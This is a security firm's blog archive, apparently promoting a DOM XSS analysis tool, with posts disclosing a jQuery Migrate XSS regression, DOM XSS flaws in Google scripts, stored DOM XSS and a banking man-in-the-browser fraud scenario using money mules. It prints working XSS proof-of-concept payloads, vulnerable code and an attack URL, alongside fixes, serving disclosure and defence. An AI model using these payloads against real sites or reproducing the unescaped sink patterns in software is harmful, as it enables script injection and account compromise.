Friday, October 18, 2013

DOMinatorPro with Martin Hall at London Tester Gathering Workshops 2013

Martin Hall will give a talk "Bug Hunting for Fun and Profit" at the London Tester Gathering Workshops 2013.

http://skillsmatter.com/event/agile-scrum/ltg-workshops

During his presentation Martin will demo DOMinatorPro Standard, and you will have the chance to try our product.

Martin will be showing how you can have fun, gain fame and earn money by finding issues in the software and websites you use every day. He'll also share some of the basic tips and techniques that will enable you to become a great "Bounty Hunter".

More information here:
http://skillsmatter.com/podcast/agile-scrum/martin-hall

Martin Hall is a Senior SDET Lead at Microsoft (Skype Division)

Thanks, Martin, for your support!

Friday, April 19, 2013

"jQuery Migrate" is a Sink, too?!

or How "jQuery Migrate" un-fixes a nasty DOMXSS without telling us...

Foreword

Today Mario Heiderich of Cure53 tweeted the following message:

"@0x6D6172696F Does anyone know why jquery.com has a special jQuery 1.9.1 version that is still vulnerable to $(location.hash)?"

What happened after that message might be considered the discovery of a rather interesting bug - which Mario and I will try to wrap up in this joint blog post.

In short:
an official jQuery plugin un-fixes a long-gone DOMXSS bug and brings it back - even on the jQuery homepage itself!

The Long Story

First, let's give the word to Mario and hear what he has to say:

"Some days ago, while being engaged in a workshop, I discovered a funny thing.
I visited the jQuery.com homepage and tried playing around with the DOMXSS that jQuery shipped with some months ago.
The one that could be exploited by passing arbitrary user input to the $() function - remember?
My goal was to demonstrate to the attendees how the XSS worked, why it worked and how it was fixed.

So, I wanted to test whether there were still ways to activate it and get past the regular expression they installed to mitigate the bug. The first thing was to try the obvious: set location.hash to <svg onload="alert(1)"> and execute $(location.hash) via the Firebug console, expecting it NOT to work.
But.
It worked.
Admittedly confused, I checked the jQuery version they deployed and it was the latest - jQuery 1.9.1.
That couldn't be - I must have done something wrong!

I decided to build a small dynamic checker to see which exact version of jQuery is vulnerable to this bug, and which is not. The tool I created - really ugly code, be warned - is here.
It simply fetches all the jQuery versions from 1.3.0 up to 2.0.0 from the Google API, tests the vector via location.hash and then goes red or stays green depending on whether the code executed or not. As can clearly be seen:
jQuery 1.6.2 was the last vulnerable version. And 1.9.1 is not!



So, what did the jQuery people do? Why is the version deployed on their homepage vulnerable when the actual 1.9.1 release isn't? How did they get their version to be buggy again? In my desperate helplessness I tweeted, and Stefano replied. He found the cause of this quirky behaviour of eternal madness."
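For reference, the check Mario describes boils down to two console steps (payload as in the original bug; this assumes a page with the vulnerable setup loaded):

// Run from the Firebug/DevTools console on the target page:
location.hash = '#<svg onload="alert(1)">';
$(location.hash); // on a vulnerable setup the fragment is parsed as HTML and alert(1) fires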

Now, Stefano (that's me :)) took a deep look into the code and started the engine of... well, you know it, DOMinatorPro, to see what kind of roguery was going on here.

"Since the day I started developing DOMinatorPro and writing the DOMXSSWiki I have studied jQuery internals thoroughly, so when Mario tweeted about that, I immediately thought of some weird, misunderstood mixed-jQuery-version behaviour, as has sometimes happened to me.
Yet, here's the screenshot:




..and the version info indeed clearly says: 1.9.1!!!
You can easily check that via $.expando by the way - no need to dig in the site sources or script code itself.
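A quick illustration (the random digits vary per page load):

$.expando
// -> e.g. "jQuery19105309742273912883": "jQuery" plus the version digits (191 for 1.9.1),
//    followed by random digits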
But, how's that possible?
Can DOMinatorPro help me?
Let's see. By simply doing the same with DOMinatorPro, it will show the following alert:


The StackTrace says:

buildFragment(elems="#<s>sss", context="[object HTMLDocument]", scripts="undefined", selection="undefined")  jquery-1.9.1.js (line 6481)

parseHTML(data="#<s>sss", context="[object HTMLDocument]", keepScripts="true")  jquery-1.9.1.js (line 521)

init(selector="#<s>sss", context="undefined", rootjQuery="[object Object]")  jquery....1.0.js (line 213)

jQuery(selector="#<s>sss", context="undefined")  jquery-1.9.1.js (line 48)


ParseHTML? No way! What are those files? Wait a moment, that jquery....1.0.js (line 213) is actually:
http://code.jquery.com/jquery-migrate-1.1.0.js !!
Let's see what's there:

var matched, browser,
 oldInit = jQuery.fn.init,
 oldParseJSON = jQuery.parseJSON,
 // Note this does NOT include the #9521 XSS fix from 1.7!
 rquickExpr = /^(?:[^<]*(<[\w\W]+>)[^>]*|#([\w\-]*))$/;

// $(html) "looks like html" rule change
jQuery.fn.init = function( selector, context, rootjQuery ) {
 var match;

 if ( selector && typeof selector === "string" && !jQuery.isPlainObject( context ) &&
   (match = rquickExpr.exec( selector )) && match[1] ) {
  // This is an HTML string according to the "old" rules; is it still?
  if ( selector.charAt( 0 ) !== "<" ) {
   migrateWarn("$(html) HTML strings must start with '<' character");
  }
  // Now process using loose rules; let pre-1.8 play too
  if ( context && context.context ) {
   // jQuery object as context; parseHTML expects a DOM object
   context = context.context;
  }
  if ( jQuery.parseHTML ) {
         return oldInit.call( this, jQuery.parseHTML( jQuery.trim(selector), context, true ),
 /* Vuln Call Here !! -^*/  context, rootjQuery );
  }
 }
 return oldInit.apply( this, arguments );
};
jQuery.fn.init.prototype = jQuery.fn; 

So, by looking at the oldInit.call, what happens here is that another jQuery sink is called (!), and that's jQuery.parseHTML."

Why is that?

It's probably a way to restore backward compatibility by recreating the old behavior using parseHTML, but the jQuery guys forgot that there are two fixes patching that original wrong design choice, the first of which dates back to versions after 1.6.2. These include the fix for the dreaded DOMXSS from Mala.
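To make the regression concrete, here's the difference in behaviour (illustrative payload; assumes a page loading the scripts as described above):

// With plain jQuery 1.9.1: a string not starting with "<" is treated as a selector,
// so this throws a selector syntax error and no HTML is parsed:
$('#<img src=x onerror=alert(1)>');

// With jquery-migrate-1.1.0 also loaded: the pre-1.7 "looks like HTML" rule is restored,
// the string is routed to jQuery.parseHTML with keepScripts=true, the <img> element is
// created and its onerror handler fires:
$('#<img src=x onerror=alert(1)>');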
 
Can it be worked around? 

Mario wrote this quick and - as he calls it himself - incredibly dirty fix, which will address the unexpected abuse of this classical pattern:

function jQMfix() {
  if (/</.test(location.hash)) {
    location.hash = location.hash.replace(/</g, '');
  }
}
onhashchange = jQMfix;
jQMfix();

The fix is - and that is Mario speaking again - extremely dirty and anything but production-ready.
But it shows a way to make sure the location.hash cannot be abused to cause DOMXSS on your precious website.
If your JavaScript is... "special", it can of course still happen.

But you get the gist - if you use the jQuery Migrate plugin, make sure your web app stays safe from DOMXSS.

Here's yet another way to approach it, from Stefano, but keep in mind that it's completely untested and more of an example of how to approach it:

jQuery = $ = (function (r) {
  return function jQuery(a, b) {
    // strip '<' from selector-looking strings such as location.hash
    if (typeof a === 'string' && a.charAt(0) === '#') {
      a = a.replace(/</g, '');
    }
    return r.apply(this, [a, b]); // delegate to the original jQuery
  };
})(jQuery);
...and, of course, feel free to improve it and paste it in a comment.

We do see a lot of plugin-caused DOMXSS in the wild - but a plugin that purposely un-fixes an existing and well-known XSS bug? That's something :-)

Also, greetings to the fellow attendees of the jQuery UK conference that is happening right now.

Have a beautiful (0-)day! :)

Tuesday, February 19, 2013

Real Life Vulnerabilities Statistics: an overview


From time to time, it is useful for a consulting company like us to stop, look back and think about what has been done in the last few years. This is important because:
  • the company can identify the categories where internal skills need to be improved;
  • the company is able to know in advance which areas are more flawed for specific customers. 
In addition to these considerations, we thought that these data would be useful for the new release of the OWASP Top Ten project.

For this reason, we collected all our reports from 2010 until 2012 and performed a statistical analysis that, in conjunction with other contributors' results, will help the new OWASP Top Ten to better fit these times and to keep track of differences from previous versions.

We started the analysis by splitting vulnerabilities in two main categories:
  • Web Application Penetration Test (WAPT)
  • Secure Code Review (SCR). 
The following histograms are the result of counting the occurrences of each vulnerability, ordered by frequency and shown as percentages.

SCR vulnerabilities percentage

WAPT vulnerabilities percentage

We think this can help in understanding how the results presented in the OWASP Top Ten 2013 were obtained. It is also an overview of what we find during our consulting assessments.

Finally, to make these data more expressive, here they are grouped by testing category (as described in the OWASP Testing Guide), in order to show which areas are more vulnerable:

SCR areas of analysis percentage

WAPT areas of analysis percentage



Thursday, February 14, 2013

Discretionary Controls and Realtime Deception Attacks


Nowadays banking authentication systems are getting more and more sophisticated in order to counter the increasing number of hacking attempts, but unfortunately attackers follow the same trend by forging new and more refined attack systems. We can define this as the classic never-ending battle between good and evil.
 
In this blog post we will talk about the threats posed by the lack of application of the proper standards (ISO 15022, ISO 8583) which regulate controls on banking transaction details.

We can summarize this lack of standardization with the following statement: “Banking transaction details are checked discretionally by the receiving institute”.

An in-depth view of discretionary controls can be found here [1].
The immediate effect of this behavior is that an attacker could choose a bank with weak controls to commit fraudulent transactions.

In this post we describe a scenario where an attacker takes advantage of a bank that accepts incoming wire transfers omitting the surname of the recipient. Too many financial institutes allow incoming wire transfers to "Giorgio" instead of to "Giorgio Rossi" as the recipient.



Another very important consequence of weak controls on transaction details is that they can disrupt the effectiveness of authentication mechanisms, especially transaction detail verification ones, because it becomes possible to carry out social engineering attacks, for example on the recipient name.

More details will be given in a specific paragraph that explains how discretionary controls can be abused. To understand the whole attack process, let's first see what an OOB authentication system is.


Overview of OOB Transaction Detail Verification devices


 
The OOB (Out-Of-Band) Transaction Detail Verification authentication system sends the banking customer a set of details about the transaction that he should approve. Those details could be, for example, IBAN, amount, recipient and country. If the requested transaction matches the customer's expectations (i.e. it seems legitimate), he validates the transfer by generating an OTP code.

Here follows an example of a typical transaction detail verification hardware device:


If the transaction is correct, the user will validate it by generating an OTP code to finalize the operation.

Let’s see how an attacker could abuse the weaknesses deriving from discretionary controls in real time, thanks to the technology offered by the most modern banking malware.

The first step is to clarify what a realtime-deception attack is and how it is accomplished.


ATS and Realtime Deception Attacks

Most modern banking malware implements a webinjection technology called ATS [2], which stands for Automatic Transfer System. Thanks to ATS, attackers can automatically commit fraudulent transactions, or modify and substitute in real time sensitive details of a legitimate transaction requested by the victim, such as the IBAN and recipient, with malicious ones.

A realtime-deception attack creates a condition in which the victim is convinced he is authorizing a legitimate transaction, when in fact he is validating the fraudulent transaction desired by the attacker.


Realtime-Deception applied to Discretionary Controls


The following picture summarizes the attack process:

It’s clear that a realtime-deception attack could be a serious threat if applied to a bank that implements weak discretionary controls.


  1. The first step is the infection of the victim with a banking malware that supports MiTB (Man in the Browser) and makes use of ATS technology.
  2. When the victim fills in the details of a legitimate transaction, the webinjection substitutes the proper IBAN and other details with malicious ones owned by the attacker. Thanks to ATS, the attacker automatically chooses the proper money mule to adopt, in this example Giorgio “Mule”. The attacker needs a mule with the same first name (not surname) as the intended recipient chosen by the user.
  3. The victim receives on the OTP device the details of the transaction, but will hardly notice the change of the IBAN code, so in the end the victim is convinced to validate the transaction. The OTP device also provides the code necessary to validate the fraudulent transaction.

Realtime-Deception attacks are suitably constructed according to the device and transaction details exposed to the victim.

However, it’s possible to categorize the possible combinations of detail alteration and related weak discretionary controls that could lead to a successful attack. The combination depends on the security design of the OOB device screen:
  1. Substitution of recipient, IBAN and amount – this could be used, for example, against phone-call authentication that does not reveal transaction details.
  2. Substitution of recipient and IBAN – this could work, for example, against devices that do not show the name among the transaction details.
  3. Substitution of the recipient’s name and deletion of the surname – this could work, for example, against devices that show only the recipient’s name.
Let’s suppose, for example, that we are in the third case: the hardware device shows only amount and name, and let’s also suppose that the bank’s transaction detail controls do not care about the recipient’s surname.
An attacker could exploit this flaw as follows. The ATS automatically chooses the best-fitting money mule; in this case the mule has the same first name as the legitimate recipient, and the surname difference is rendered useless by the nature of this specific control weakness: for example Giorgio “Real” -> Giorgio “Mule”,
where Giorgio “Mule” is a money mule owned by the attacker.
From the victim’s point of view it would be impossible to distinguish Giorgio “Real” from Giorgio “Mule”; this finally leads the customer to validate the fraudulent transaction.

The aim of this simple attack scenario is to show that it’s possible to find a specific banking institute with poor controls, for example one that allows transactions containing a wrong beneficiary name. For an attacker it is an easy task to change the IBAN code and leave the same recipient name.

Each kind of substitution/modification strictly depends on the weak discretionary control applied by the specific bank.

It’s interesting to highlight that the right mix of social engineering, webinjection capabilities and knowledge of the detail validation flaws could pose a serious threat to the vast majority of OOB transaction detail verification authentication systems (hardware and software).

From a defense point of view, it becomes clear that adopting the proper transaction detail verification standards [3] [4] represents a significant improvement in terms of security.

Written by Giorgio Fedon and Giuseppe Bonfà

References:

Thursday, November 8, 2012

DOMinatorPro Fuzzer finds a DOM XSS on Google.com

Introduction a.k.a. tl;dr


A quite simple DOM Based XSS was found in the https://www.google.com/ context using DOMinatorPro.
What I think is interesting here is to show how DOMinatorPro works in this real-world case.

In order to give a more detailed description, I recorded a video (HD) to show how DOMinatorPro can help in finding this particular kind of issue.




Some Details

DOMinatorPro is a runtime JavaScript DOM XSS analyzer, which means it can check for complex filters and help in finding debug and/or unreferenced parameters during JavaScript execution.

In order to do that, DOMinatorPro exposes a fuzzer button which fuzzes the URL query string and HTML input elements that have keyboard events attached to them, as shown in the YouTube video.
By using that feature I found that the code in
http://www.googleadservices.com/pagead/landing.js
uses unvalidated input to build the argument of two document.write calls.

This javascript is used, among others, by:
http://www.google.com/toolbar/ie/index.html
and
https://www.google.com/toolbar/ie/index.html
which means that, one more time, an (almost) 3rd-party script introduces a flaw in the context of an unaware domain.

Source Analysis

From http://www.googleadservices.com/pagead/landing.js (which has now been removed), the following lines do not escape user input:

Line 53:
    if (w.google_conversion_ad) {
      url = url + "&gad=" + w.google_conversion_ad;
    }
    if (w.google_conversion_key) {
      url = url + "&gkw=" + w.google_conversion_key;
    }
    if (w.google_conversion_mtc) {
      url = url + "&gmtc=" + w.google_conversion_mtc;
    }
    if (w.google_conversion_raw) {
      url = url + "&graw=" + w.google_conversion_raw;
    }
    if (w.google_conversion_domain) {
      url = url + "&dom=" + w.google_conversion_domain;
    }
   
And those values are extracted using:
function google_get_param(url, param) {
  var i;
  var val;
  if ((i = url.indexOf("?" + param + "=")) > -1 ||
      (i = url.indexOf("?" + param.toUpperCase() + "=")) > -1 ||
      (i = url.indexOf("&" + param + "=")) > -1 ||
      (i = url.indexOf("&" + param.toUpperCase() + "=")) > -1) {
    val = url.substring(i + param.length + 2, url.length);
    if ((i = val.indexOf("&")) > -1) {
      val = val.substring(0, i);
    }
  }
  return val;
}
...
google_conversion_ad = google_get_param(url, "gad");
if (window.google_conversion_ad) {
  (google_conversion_key = google_get_param(url, "gkw")) ||
  (google_conversion_key = google_get_param(url, "ovkey"));
  google_conversion_mtc = google_get_param(url, "ovmtc");
  google_conversion_raw = google_get_param(url, "ovraw");
}
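To see what this extraction returns for a malicious query string, a quick illustration (values assumed):

// Illustration only: google_get_param does no decoding or escaping
var url = 'http://www.google.com/toolbar/ie/index.html?&gad=AAAA"onload="alert(document.domain)"';
google_get_param(url, 'gad');
// -> 'AAAA"onload="alert(document.domain)"' - the quotes survive untouched
//    and are later concatenated, unescaped, into the markup below.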

After the previous code, the url variable is used on line 91:

document.write('<iframe name="google_conversion_frame"' +
' width="' + width + '"' +
' height="' + height + '"' +
' src="' + url + '"' +
' frameborder="0"' +
' marginwidth="0"' +
' marginheight="0"' +
' vspace="0"' +
' hspace="0"' +
' allowtransparency="true"' +
' scrolling="no">');

and line 103:

document.write('<img src="' + url + '&ifr' + 'ame=0"' + ' />');
so the offending URL (which can be found with the DOMinatorPro fuzzer) is:

http://www.google.com/toolbar/ie/index.html?&gad=bbbb&gkw=yyyy&ovkey=10101010&ovmtc=14141414&ovraw=18181818&

and an attack payload like the following can be appended to any of those parameters:

AAAA"onload="alert(document.domain)"
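To make the breakout concrete, here is a minimal self-contained sketch (domain and markup assumed for illustration):

// Sketch: an unescaped parameter concatenated into markup written via document.write
var gad = 'AAAA"onload="alert(document.domain)"'; // attacker-controlled value
var url = 'http://example.invalid/pagead/conversion?x=1&gad=' + gad;
document.write('<iframe name="google_conversion_frame" src="' + url + '"></iframe>');
// The injected quote closes the src attribute, so the browser actually parses:
//   <iframe ... src="...&gad=AAAA" onload="alert(document.domain)"></iframe>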

Remediation

I suggested that using encodeURIComponent on user data
    if (w.google_conversion_ad) {
      url = url + "&gad=" + encodeURIComponent(w.google_conversion_ad);
    }
    if (w.google_conversion_key) {
      url = url + "&gkw=" + encodeURIComponent(w.google_conversion_key);
    }
    if (w.google_conversion_mtc) {
      url = url + "&gmtc=" + encodeURIComponent(w.google_conversion_mtc);
    }
    if (w.google_conversion_raw) {
      url = url + "&graw=" + encodeURIComponent(w.google_conversion_raw);
    }
    if (w.google_conversion_domain) {
      url = url + "&dom=" + encodeURIComponent(w.google_conversion_domain);
    }

would have solved the problem.
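With that change the quote and equals characters in the payload are percent-encoded and become inert inside the attribute:

encodeURIComponent('AAAA"onload="alert(document.domain)"');
// -> 'AAAA%22onload%3D%22alert(document.domain)%22'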

Anyway, Google fixed that by removing that script for good, which is a solution as well! :)

Conclusions 

As already said in my previous post, I still see DOM based XSS all around, with little awareness and with all actors in the SDLC having difficulties identifying them.
DOMinatorPro can really help in finding DOM based XSS: it helps testers, developers and QA users by giving them the information they need, adapted to the knowledge they have.

Give DOMinatorPro a Try

Do you still trust all those 3rd-party JavaScripts embedded in your pages?
Just browse your site with DOMinatorPro or fuzz your pages and see what happens. :)
In case you need help, check out our professional services or just ask for a contact.

Monday, November 5, 2012

DOM XSS on Google Plus One Button

Introduction

DOMinatorPro can be very useful for finding DOM Based XSS in complex JavaScript web applications. This post will describe a Cross Origin Resource Sharing (CORS) abuse exploiting a flaw in the JavaScript Plus One code on plus.google.com.
Just to be clear, yes, it's the +1 button present on billions of pages around the internet.
The issue affected the context of https://plus.google.com which is the context of the social network.

Before going further with any details, a picture is worth a thousand words:



In order to better explain the issue and show how DOMinatorPro helped me in finding the problem, and since a video is worth a thousand pictures, I recorded a video on the MindedSecurity YouTube channel.






In the video I deliberately chose not to show a single line of JavaScript, in order to demonstrate what DOMinatorPro can do for a tester with little knowledge of JavaScript.

In this post, on the other hand, I'd like to discuss how the input was treated and how Google fixed the issue with input validation.

Code Issue Details

The offending URL in a simplified version was:
https://plusone.google.com/_/+1/fastbutton?url=http://www.example.com&ic=1&jsh=m;/_/apps-static/_/js/gapi/__features__/rt=j/ver=ZZZZ/sv=1/am=!YYYY/d=1/rs=XXX

First of all, a throw "Bad URL" exception can be spotted on line 425, which checks for the presence of multiple callbacks (/cb=/) in the 'l' variable and for the presence of the classic /[@"'<>#\?&%]/ metacharacters via the 'ga' regular expression. If those checks fail, an exception (Bad URL) is thrown.
That is called data validation.
 
420 d = m.split(";");
421 d = (i = M[d.shift()]) &&  i(d);
422 if (!d) throw "Bad hint:" + m;
423 i = d = d[q]("__features__", T(r))[q](/\/$/, "") + 
                   (e[s] ? "/ed=1/exm=" + T(e) : "")
                   + ("/cb=gapi." + J);
424 l = i.match(ha); // "https://apis.google.com/TAINTED/cb=gapi.loaded_0".match(/\/cb=/g)
425 if (!l || !(1 === l[s] && 
                 ga[p](i) && !fa[p](i)))
                      throw "Bad URL " + d;
426 e[k].apply(e, r);
427 L("ml0", r, I);
428 c[R.f] || t.___gapisync ?
     (c = d, "loading" != u.readyState ? 
     W(c) :
     u.write("<" + S + ' src="' + encodeURI(c) + '"></' + S + ">")) :
     W(d, c, J) 
....

Line 428 is the call to the function that performs an XMLHttpRequest. Following the flow, on line 532 (beautified) the 'l' variable is tainted; it's the one traced by DOMinatorPro, originating from the jsh parameter in location.href:

starting from: jsh=m;/_/apps-static/_/js/gapi/....

becomes "https://apis.google.com/_/apps-static/_/js/gapi/..../cb=gapi.loaded_0", and l[q] is the replace function:

function W(){
...
531 a = v.XMLHttpRequest,
532 l = l[q](/^https?:\/\/[^\/]+\//, "/"), 
533 m = new a;
534 m.open("GET", l, f)
...
}
So on line 532 https://apis.google.com/ is removed and 'l' becomes:

"/_/apps-static/_/js/gapi/..../cb=gapi.loaded_0"

The reason why there is execution is that the response is evaluated using the following code:

B=function(a,b,c){v.execScript?v.execScript(b,"JavaScript"):c?a.eval(b):
 (a=a.document,c=a.createElement("script"),c.defer=i,
 c.appendChild(a.createTextNode(b)...
Now, about the fix: I suggested that Google perform some input validation using A tag properties,
var aa=document.createElement("a");
aa.href=untrustedURL;

and then use aa.pathname, to be sure it's the browser doing the parsing job; but that probably does not work perfectly across all browsers.
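A minimal sketch of that idea (the path prefix and the loadScript helper are hypothetical):

var aa = document.createElement("a");
aa.href = untrustedURL;                        // let the browser parse the URL
// hypothetical check: accept only paths under the expected prefix
if (aa.pathname.indexOf("/_/apps-static/") === 0) {
  loadScript(aa.pathname);                     // hypothetical loader
}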

In fact, the Google devs decided to add more data validation:

if (!l || !(1 === l[v] && ha[q](d) && 
            ga[q](d) && h && 1 === h[v]))
  throw "Bad URL " + a;
That code changes one check and adds another condition to the ones we already discussed.
In particular:
 
ga[q](d) changes from /[@"'><#\?&%]/ (blacklist) 
                 to  /^[\/_a-zA-Z0-9,.\-!:=]+$/ (whitelist)
 
And  
1 === h[v] has been added, and means there must be only one "//" (as in http://).
Which seems pretty solid to me, at least in the context of this specific issue; of course, bypasses are always around the corner, but I'm sure the Google security guys made their best effort to be sure it's safe!
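To see the new whitelist in action, here are a couple of illustrative checks (inputs assumed):

var ga = /^[\/_a-zA-Z0-9,.\-!:=]+$/;                        // the new whitelist
ga.test("/_/apps-static/_/js/gapi/rt=j/cb=gapi.loaded_0");  // true - every character is allowed
ga.test('/x";alert(1);//');                                 // false - '"' and ';' are rejected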

Conclusions

DOM Based XSS still remains quite untested, because JavaScript is not easy to analyze in complex scenarios.
DOMinatorPro can really help in finding issues across the whole easy-to-hard-to-identify range of the DOM Based XSS category, because DOMinatorPro is not as simple as you might think: it's a complex piece of software with a large knowledge base in it.

Tuesday, October 9, 2012

Stored DOM Based Cross Site Scripting

Since the very first release of DOMinatorPro, there has been a little 'S' button in the bottom-right corner:


Q: What does it mean?
A: First of all, I'd say it actually means that there's another feature that makes DOMinatorPro a bleeding-edge tool for finding DOM Based XSS :).

The Stored Strings tainting is a very interesting feature that DOMinatorPro implements for tracking stored DOM Based Cross Site Scripting issues.

Think about the following scenario.

Pseudo code:

setName.do:
  String name = getFromParameter("name");
  saveOnDB(name);

getName.do:
  String name = getNameFromDB();
  // escape the source (name) from DB so no stored XSS is there
  String jsEscape = encodeForJavaScript(name);
  print "<script>\n";
  // No problem here since it's escaped.
  print "var aname='({\"aName\":\"" + jsEscape + "\"})';";
  print "eval(aname);\n";
  print "</script>";
So we'll get in the getName.do page:

..
<script>
var aname = '({"aName":"PATTERN"})';
eval(aname);
</script>
..
At this point you surely understand the issue in the flow:

Step 1. Attacker sends name=PATTERN

  

Step 2. Victim visits a page with the flawed Js.




The attacker can't directly break out of the string since it's supposed to be correctly escaped, so a payload like name=testPATTERN"'> will become:

var aName="testPATTERN\x22\x27\x3c"; ..
This is not directly exploitable, but if that same variable is used as an argument to Function or eval, or innerHTML, or any of the sinks described on the DOMXSS Wiki (contribute please), then it's an exploitable issue.
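To see why the eval step re-opens the hole, here is a sketch (payload assumed for illustration):

// Stored payload (assumed): name = "+alert(1)+"   (the quotes are part of the payload)
// After encodeForJavaScript, the page source contains:
var aname = '({"aName":"\x22+alert(1)+\x22"})';
// The \x22 escapes are decoded when this string literal is parsed, so at runtime:
//   aname === '({"aName":""+alert(1)+""})'
eval(aname); // the eval'd source now contains live quotes - alert(1) fires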

No existing tool but DOMinatorPro is able to trace patterns like that during JavaScript execution.
All the tester has to do is turn on tainting of Stored Strings and set the pattern to be traced in the settings:


Finally, the user will just have to create the scenario by browsing the application with DOMinatorPro.
And she'll get some output like the following:


Where StoredTainted is the constant string transformed into a tainted one on the fly.

There are several interesting possibilities in using tainted stored strings, like applying the same checks to responses from XMLHttpRequests.
But that's food for another blog post.

Feedback is, as usual, really welcome!

PS. If you're a licensed user, remember to update the DOMinatorPro Extension to the latest version from your dominator downloads page.